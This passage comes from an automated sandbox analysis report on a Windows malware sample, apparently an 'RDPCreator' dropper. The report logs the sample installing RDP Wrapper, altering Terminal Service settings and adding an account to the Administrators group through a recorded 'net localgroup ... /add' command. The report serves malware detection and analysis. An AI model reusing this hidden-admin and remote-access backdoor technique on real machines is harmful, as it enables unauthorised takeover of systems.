                        Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\net1.exeSection loaded: samlib.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeFile written: C:\Program Files\RDP Wrapper\rdpwrap.iniJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeDirectory created: C:\Program Files\RDP WrapperJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeDirectory created: C:\Program Files\RDP Wrapper\rdpwrap.iniJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeDirectory created: C:\Program Files\RDP Wrapper\rdpwrap.dllJump to behavior
                        Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: Binary string: \??\C:\Windows\symbols\exe\RDPCreator.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3520024706.0000000006CD0000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.Xml.ni.pdb source: WER7437.tmp.dmp.27.dr
                        Source: Binary string: System.pdb` source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3517364014.000000000128C000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.ni.pdbRSDS source: WER7437.tmp.dmp.27.dr
                        Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3518682753.00000000030AF000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: n0C:\Windows\mscorlib.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3516600470.0000000000F39000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: System.Configuration.ni.pdb source: WER7437.tmp.dmp.27.dr
                        Source: Binary string: rdpclip.pdb source: RDPWInst.exe, 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp, RDPWInst.exe.0.dr
                        Source: Binary string: mscorlib.ni.pdbRSDS source: WER7437.tmp.dmp.27.dr
                        Source: Binary string: RfxVmt.pdbGCTL source: RDPWInst.exe, 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp, RDPWInst.exe.0.dr, rfxvmt.dll.3.dr
                        Source: Binary string: 00000000000000000400000000000000.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3520024706.0000000006CD0000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.Configuration.pdb source: WER7437.tmp.dmp.27.dr
                        Source: Binary string: RDPCreator.pdbH source: WER7437.tmp.dmp.27.dr
                        Source: Binary string: \??\C:\Windows\System.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3517364014.000000000128C000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbI source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3517364014.0000000001283000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.Xml.pdb source: WER7437.tmp.dmp.27.dr
                        Source: Binary string: System.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3518682753.00000000030AF000.00000004.00000800.00020000.00000000.sdmp, WER7437.tmp.dmp.27.dr
                        Source: Binary string: System.Xml.ni.pdbRSDS# source: WER7437.tmp.dmp.27.dr
                        Source: Binary string: System.Configuration.pdbt source: WER7437.tmp.dmp.27.dr
                        Source: Binary string: System.Core.ni.pdb source: WER7437.tmp.dmp.27.dr
                        Source: Binary string: mscorlib.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3518682753.00000000030AF000.00000004.00000800.00020000.00000000.sdmp, WER7437.tmp.dmp.27.dr
                        Source: Binary string: rdpclip.pdbH source: RDPWInst.exe, 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp, RDPWInst.exe.0.dr
                        Source: Binary string: C:\Users\Scarrled\Desktop\test\RDPCreator\RDPCreator\obj\Release\RDPCreator.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe
                        Source: Binary string: rdpclip.pdbJ source: RDPWInst.exe, 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp, RDPWInst.exe.0.dr
                        Source: Binary string: mscorlib.ni.pdb source: WER7437.tmp.dmp.27.dr
                        Source: Binary string: \??\C:\Windows\mscorlib.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3517364014.000000000128C000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: RfxVmt.pdb source: RDPWInst.exe, 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp, RDPWInst.exe.0.dr, rfxvmt.dll.3.dr
                        Source: Binary string: System.Core.pdb source: WER7437.tmp.dmp.27.dr
                        Source: Binary string: System.Xml.pdb8 source: WER7437.tmp.dmp.27.dr
                        Source: Binary string: RDPCreator.pdb source: WER7437.tmp.dmp.27.dr
                        Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER7437.tmp.dmp.27.dr
                        Source: Binary string: System.ni.pdb source: WER7437.tmp.dmp.27.dr
                        Source: Binary string: System.Core.ni.pdbRSDS source: WER7437.tmp.dmp.27.dr
                        Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeStatic PE information: 0xF215694F [Sat Sep 13 23:31:27 2098 UTC]
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeCode function: 0_2_01410507 push edi; retf 0_2_0141050A
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 3_2_004430DC push 00443161h; ret 3_2_00443159
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 3_2_00439674 push ecx; mov dword ptr [esp], ecx3_2_00439675
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 3_2_00420164 push 004201DAh; ret 3_2_004201D2
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 3_2_0040A178 push 0040A1E7h; ret 3_2_0040A1DF
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 3_2_00437134 push 00437201h; ret 3_2_004371F9
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 3_2_00443188 push 00443230h; ret 3_2_00443228
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 3_2_0043421C push ecx; mov dword ptr [esp], edx3_2_0043421E
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 3_2_0044323C push 004432C7h; ret 3_2_004432BF
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 3_2_00437298 push 0043732Eh; ret 3_2_00437326
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 3_2_00437360 push 004373ADh; ret 3_2_004373A5
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 3_2_0043A3F8 push 0043A450h; ret 3_2_0043A448
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 3_2_004176D4 push 00417879h; ret 3_2_00417871
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 3_2_00421998 push 004219E5h; ret 3_2_004219DD
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 3_2_0042AA70 push ecx; mov dword ptr [esp], edx3_2_0042AA75
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 3_2_0040CA10 push eax; retf 0040h3_2_0040CA11
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 3_2_0042AAB4 push ecx; mov dword ptr [esp], edx3_2_0042AAB9
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 3_2_00415C58 push ecx; mov dword ptr [esp], edx3_2_00415C5D
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 3_2_0040EC80 push ecx; mov dword ptr [esp], ecx3_2_0040EC85
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 3_2_00404E0C push eax; ret 3_2_00404E48
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 3_2_0043FE8C push 0043FEE0h; ret 3_2_0043FED8

                        Persistence and Installation Behavior

                        barindex
                        Adds a new user with administrator rights
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" RDPUser_217d5074 /addJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeFile created: C:\Users\user\AppData\Local\Temp\RDPWInst.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeFile created: C:\Program Files\RDP Wrapper\rdpwrap.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeFile created: C:\Windows\System32\rfxvmt.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeFile created: C:\Windows\System32\rfxvmt.dllJump to dropped file
                        Source: C:\Windows\System32\drivers\tsusbhub.sysRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\tsusbhub\Parameters\WdfJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TermService\ParametersJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 3_2_0043B58C OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,StartServiceW,GetLastError,Sleep,StartServiceW,CloseServiceHandle,CloseServiceHandle,3_2_0043B58C
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeMemory allocated: 1410000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeMemory allocated: 2FC0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeMemory allocated: 4FC0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: OpenSCManagerW,GetLastError,EnumServicesStatusExW,GetLastError,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,GetLastError,CloseServiceHandle,3_2_0043B7D4
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeWindow / User API: threadDelayed 7562Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeWindow / User API: threadDelayed 2401Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeDropped PE file which has not been started: C:\Program Files\RDP Wrapper\rdpwrap.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeDropped PE file which has not been started: C:\Windows\System32\rfxvmt.dllJump to dropped file
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe TID: 6636Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe TID: 6712Thread sleep count: 7562 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe TID: 6732Thread sleep count: 2401 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 3_2_004092D8 FindFirstFileW,FindClose,3_2_004092D8
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 3_2_0040F73C FindFirstFileW,FindClose,3_2_0040F73C
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 3_2_00408EB9 lstrcpynW,FindFirstFileW,FindClose,lstrlenW,lstrcpynW,lstrlenW,lstrcpynW,3_2_00408EB9
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 3_2_00409D02 GetSystemInfo,3_2_00409D02
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: Amcache.hve.27.drBinary or memory string: VMware
                        Source: Amcache.hve.27.drBinary or memory string: VMware Virtual USB Mouse
                        Source: Amcache.hve.27.drBinary or memory string: vmci.syshbin
                        Source: Amcache.hve.27.drBinary or memory string: VMware, Inc.
                        Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3518682753.000000000307A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3518682753.000000000307D000.00000004.00000800.00020000.00000000.sdmp, net1.exe, 00000014.00000002.1719504971.0000000000998000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: *Hyper-V Administrators
                        Source: Amcache.hve.27.drBinary or memory string: VMware20,1hbin@
                        Source: Amcache.hve.27.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                        Source: Amcache.hve.27.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                        Source: Amcache.hve.27.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                        Source: Amcache.hve.27.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                        Source: Amcache.hve.27.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                        Source: Amcache.hve.27.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
